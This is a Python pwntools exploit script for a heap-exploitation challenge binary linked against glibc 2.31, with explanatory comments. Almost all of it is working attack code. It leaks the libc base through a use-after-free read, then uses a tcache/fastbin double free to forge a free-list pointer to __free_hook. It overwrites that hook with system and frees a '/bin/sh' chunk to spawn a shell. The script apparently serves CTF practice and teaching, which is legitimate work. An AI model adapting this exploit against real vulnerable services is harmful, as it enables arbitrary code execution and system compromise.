glibc 2.31
exp:
from pwn import *
# Pwntools runtime configuration: verbose I/O logging, x86-64 word size for
# p64()/u64(), and a tmux split so the gdb.attach() further down has a pane.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# Remote target is left commented out; the script runs against a local copy.
# io=remote("node3.anna.nssctf.cn",28245)
io=process("./service")
# Symbol offsets (system, __malloc_hook, __free_hook) are read from this exact
# build; the leak arithmetic below is only valid for this libc version.
libc=ELF("./libc-2.31.so")
def add(n, s, cc):
    """Drive menu option 1 of the service: create entry *n* of size *s* holding *cc*.

    *n* and *s* are sent as text lines (``str(...)``, as the service's menu
    reads them); *cc* is sent raw with no trailing newline. Uses the global
    ``io`` tube.
    """
    prompt = b">> "
    io.sendlineafter(prompt, b"1")
    # Index first, then size: the order the menu asks for them.
    for field in (n, s):
        io.sendlineafter(prompt, str(field))
    io.sendafter(prompt, cc)
def show(n):
    """Drive menu option 2 of the service: print the contents of entry *n*.

    Uses the global ``io`` tube; the caller reads the response itself.
    """
    for payload in (b"2", str(n)):
        io.sendlineafter(b">> ", payload)
def delete(n):
    """Drive menu option 3 of the service: delete entry *n*.

    Uses the global ``io`` tube. Whether the service clears its slot after
    freeing is not visible from here; the sequence below relies on it not doing so.
    """
    for payload in (b"3", str(n)):
        io.sendlineafter(b">> ", payload)
# --- Stage 1: libc address leak -------------------------------------------
# Eight 0x90-byte entries (indexes 0-7). Presumably seven fill the tcache bin
# for this size when deleted and the eighth lands in the unsorted bin, which
# stores libc pointers in the freed chunk — TODO confirm against the binary.
for i in range(8):
    add(i,0x90,b"/bin/sh\x00")
# A small separate entry so the last freed 0x90 chunk is not merged into the
# top chunk (inferred from the usual pattern; not verifiable from here).
add(8,0x10,b"/bin/sh\x00")
for i in range(8):
    delete(i)
# Reading an already-deleted entry: the service still dereferences the freed
# pointer (use-after-free read), which is the information-leak primitive.
# Service-side fix: clear the slot on delete and reject show() on empty slots.
show(7)
# Everything up to the first 0x7f byte ends in a 6-byte user-space pointer;
# pad it to 8 bytes before unpacking. 0x70 is assumed to be the distance from
# __malloc_hook to the leaked main_arena field in glibc 2.31 — version-specific.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))  # libc base address
sys_addr=leak_addr+libc.sym[b"system"]
free_hook=leak_addr+libc.sym[b"__free_hook"]
# --- Stage 2: redirect __free_hook to system ------------------------------
# Ten 0x60-byte entries (indexes 0-9); the first seven deletes fill the
# tcache bin for this size, so the deletes after them go to the fastbin.
for i in range(0,10):
    add(i,0x60,b"/bin/sh\x00")
for i in range(0,7):
    delete(i)
# Debug scaffolding: blocks in a tmux pane until a debugger is attached and
# the script is resumed. It has no effect on the heap state itself.
gdb.attach(io)
pause()
delete(9)
# NOTE(review): index 10 is never allocated by this script. Whether this is a
# no-op or an out-of-bounds slot access depends on the service's index check,
# which is not visible here.
delete(10)
# Index 7 is deleted twice with one other delete in between: a double free
# that only works because the service keeps the stale pointer. Service-side
# mitigation is to null the slot on delete and reject repeated deletes.
delete(7)
delete(8)
delete(7)
# Seven allocations drain the tcache entries freed above, so the following
# allocations are served from the fastbin chain that now contains index 7 twice.
for i in range(0,7):
    add(i,0x60,b"/bin/sh\x00")
# The payload of this entry is the __free_hook address, i.e. a forged free-list
# link written into the doubly-freed chunk.
add(11,0x60,p64(free_hook))
add(12,0x60,b"/bin/sh\x00")
add(13,0x60,b"/bin/sh\x00")
# Presumably this allocation is served at __free_hook itself, so its payload
# (system's address) overwrites the hook. Note that the malloc hooks were
# removed in glibc 2.34, which removes this target entirely.
add(14,0x60,p64(sys_addr))
# free() on an entry whose contents are "/bin/sh\0" now goes through the hook.
delete(12)
io.interactive()